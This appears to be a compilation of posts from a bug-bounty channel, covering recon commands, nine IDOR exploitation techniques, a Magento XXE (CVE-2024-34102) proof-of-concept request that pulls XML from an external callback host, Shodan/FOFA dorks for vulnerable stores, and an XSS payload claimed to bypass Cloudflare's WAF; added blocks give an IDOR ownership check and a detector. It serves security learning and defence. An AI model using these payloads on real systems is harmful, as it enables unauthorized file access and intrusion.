China now has their own GitHub/public Git repository hosting service called GitCode; it is owned and operated by CSDN under the company name "重庆开源共创科技有限公司".
It is being reported that many users' repositories are being cloned and re-hosted on GitCode without authorization - meaning your project may very well be on this service without you explicitly allowing it.
tldr: GitCode or China is attempting to mirror/clone the entire GitHub over to their own servers and there's nothing you can do about it, even if your license somehow disagrees with it.
Credit: https://x.com/azakasekai_/status/1805844941438075163?s=46&t=GxBcd0lJbjtL_W3TmBw-tA
#github #gitcode
Brut Security
Looking for someone who can contribute to the next 30-day Bug Bounty Challenge. Similar to this: https://nas.io/brutsecurity
Day 1: Run Subfinder
Day 2: Scrape JS
Day 3: Report, etc., till day 30.
Brut Security pinned « Join Our Bugbounty Discussion Group https://t.me/brutsec https://discord.gg/GZBsQMY6 »
Pentest-Windows
Windows11 Penetration Suite Toolkit
A Windows penetration testing environment that works out of the box.
This project was created for educational purposes and should not be used in environments without legal authorization.
Link: https://lnkd.in/gtX3GbR8
#infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #hackingtools #networksecurity
You can now passively enumerate all endpoints of a website with katana (no need for waybackurls).
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter them in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
Scan for Adobe Commerce & Magento - XXE
(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei
Details: https://lnkd.in/dBy32DtY
Nuclei Template: https://lnkd.in/dUNFMUny
GitHub PR: https://lnkd.in/dqu65C5i
#bugbounty #adobe #pdteam #infos
Advanced IDORs - 9 Techniques by Intigriti:
1. Exploiting Basic IDORs
How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).
2. Exploiting IDORs via Parameter Pollution
How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.
3. Exploiting IDORs via JSON Globbing
How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.
4. Exploiting Method-Based IDORs
How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.
5. Exploiting Content-Type-Based IDORs
How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.
6. Exploiting IDORs via Deprecated API Versions
How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.
7. Exploiting IDORs in APIs that Use Static Keywords
How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.
8. Exploiting IDORs that Require Unpredictable IDs
How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.
9. Exploiting Second-Order IDOR Vulnerabilities
How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------
I've never seen real-world examples for some of them, but they are definitely worth a try.
#pentesting #appsec #bugbounty #cybersecurity
Here's the full scoop: https://buff.ly/3zfhhzL
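An added defensive counterpart to the nine techniques above (example code written for this note, not Intigriti's or the channel's): one server-side resolver that maps every request to the caller's own user id, so parameter pollution, JSON globbing, method or Content-Type switches, and the me/current aliases all collapse into the same ownership comparison. The parameter name user_id, the Forbidden exception and the request shapes are assumptions; the same function is meant to back every API version the server still exposes.

```python
import json
import re
from urllib.parse import parse_qsl

class Forbidden(Exception):
    """Raised when a request does not map cleanly onto the caller's own object."""

ID_RE = re.compile(r"^[1-9]\d{0,9}$")   # exactly one positive id of bounded size
SELF_ALIASES = {"me", "current"}        # keywords that mean "the session user"

def _candidate_ids(content_type, query, body):
    """Every user_id supplied in the query string or body, duplicates kept."""
    found = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "user_id"]
    if not body:
        return found
    if content_type.split(";")[0].strip().lower() == "application/json":
        doc = json.loads(body)
        if not isinstance(doc, dict):
            raise Forbidden("JSON body must be an object")
        if "user_id" in doc:
            found.append(doc["user_id"])
    else:  # any other body is read as a form; the header never relaxes the rules
        found += [v for k, v in parse_qsl(body, keep_blank_values=True) if k == "user_id"]
    return found

def resolve_user_id(session_user_id, content_type="", query="", body=""):
    """Return the single user id this request may act on, or raise Forbidden.
    The same code serves GET and POST, every Content-Type and every API version."""
    ids = _candidate_ids(content_type, query, body)
    if not ids:
        return session_user_id                 # no id supplied: act as yourself
    if len(ids) != 1:
        raise Forbidden("user_id supplied more than once")   # parameter pollution
    raw = ids[0]
    if isinstance(raw, bool) or not isinstance(raw, (str, int)):
        raise Forbidden("user_id must be a scalar")          # arrays, objects, booleans
    text = str(raw).strip()
    if text in SELF_ALIASES:
        return session_user_id                 # aliases resolve from the session only
    if not ID_RE.match(text):
        raise Forbidden("malformed user_id")   # wildcards, negatives, oversized integers
    if int(text) != session_user_id:
        raise Forbidden("object belongs to another user")    # the ownership check itself
    return session_user_id

def export_for(stored_user_id, session_user_id):
    """Second-order use: an id read back from storage is re-checked before use."""
    return resolve_user_id(session_user_id, query=f"user_id={stored_user_id}")
```

Unpredictable IDs (technique 8) are not a substitute for this comparison; the ownership check is what protects the object whether the id is numeric or a UUID.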
- Web Scanner & Crawler
- Fuzzing with Intruder (Part 3)
- Fuzzing with Intruder (Part 2)
- Fuzzing with Intruder (Part 1)
- XSS Validator
- Configuring Proxy
- Burp Collaborator
- HackBar
- Burp Sequencer
- Turbo Intruder
- Engagement Tools
- Payload Processing Rule (Part 2)
- Payload Processing Rule (Part 1)
- Beginners Guide to Burpsuite Payloads (Part 2)
- Beginners Guide to Burpsuite Payloads (Part 1)
- Encoder & Decoder Tutorial
- Active Scan++
- Software Vulnerability Scanner
- Burp's Project Management
- Repeater
Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed "CosmicSting" jeopardizes millions of online stores built on Adobe Commerce and Magento platforms.
CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961), the vulnerability can be escalated to remote code execution.
Hunter: http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
Unauthenticated Magento XXE | CVE-2024-34102 | Bug Bounty POC | Brut Security
Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed "CosmicSting" jeopardizes millions of online stores built on Adobe Commerce and Magento platforms.
CosmicSting enables attackers to gain unauthorized access to sensitive files, including…
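An added detection example (written for this note; not code from the post, from Adobe or from the video): a narrow signature over the request shape quoted above, flagging POSTs to a cart estimate-shipping-methods endpoint whose JSON carries the totalsCollector/sourceData/dataIsURL keys that a shipping address never needs. The sample requests are constructed, the callback host is a placeholder, and the path pattern is an assumption based on the one path shown.

```python
import json
import re

# Constructed sample traffic (method, path, body); not real logs. The first
# entry mirrors the request shape quoted in the post with a placeholder host.
SAMPLE_REQUESTS = [
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
     '{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":'
     '{"data":"http://callback.example/xxe.xml","dataIsURL":true,"options":12345678}}}}}}'),
    ("POST", "/rest/V1/guest-carts/1/estimate-shipping-methods",
     '{"address":{"street":["1 Main St"],"city":"Springfield","countryId":"US"}}'),
    ("GET", "/rest/V1/products", ""),
]

# Assumed path shape, generalised from the single path in the post.
ESTIMATE_PATH = re.compile(r"carts/[^/]+/estimate-shipping-methods$")
# Keys that have no business inside a shipping-address payload.
SUSPICIOUS_KEYS = {"totalsCollector", "collectorList", "totalCollector", "sourceData", "dataIsURL"}

def _collect_keys(node, out):
    """Recursively gather every object key in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            out.add(key)
            _collect_keys(value, out)
    elif isinstance(node, list):
        for value in node:
            _collect_keys(value, out)
    return out

def flag_request(method, path, body):
    """Return the suspicious keys found in one request, or an empty set."""
    if method != "POST" or not ESTIMATE_PATH.search(path):
        return set()
    try:
        doc = json.loads(body)
    except ValueError:          # malformed JSON is a different problem; not this signature
        return set()
    return _collect_keys(doc, set()) & SUSPICIOUS_KEYS

def scan(requests=SAMPLE_REQUESTS):
    """Map each matching request's index to the sorted keys that triggered it."""
    return {i: sorted(hit) for i, (m, p, b) in enumerate(requests) if (hit := flag_request(m, p, b))}
```

The signature matches only the nesting shown in the post, so a clean scan is not proof that an unpatched store is safe; treat a hit as a reason to patch and review surrounding traffic.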
#bugbounty #bugbountytips
Whoever is commenting that it doesn't work on the latest updates of Firefox, the video is for them only. No offence to anyone, but you guys lack a lot of research!
When combined with a recent Linux bug (CVE-2024-2961), the vulnerability can be escalated to remote code execution.
Unauthenticated Magento XXE to Path traversal | CVE-2024-34102 | Bug Bounty POC
Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed "CosmicSting" jeopardizes millions of online stores built on Adobe Commerce and Magento platforms.
CosmicSting enables attackers to gain unauthorized access to sensitive files…
Hope you guys are learning from the resources I am sharing; if you have any suggestions or questions, you can comment.
Thanks and Regards,
The Brut Security Team
When hunting for IDORs during a bug bounty program, consider the following tips:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.target.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.target.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">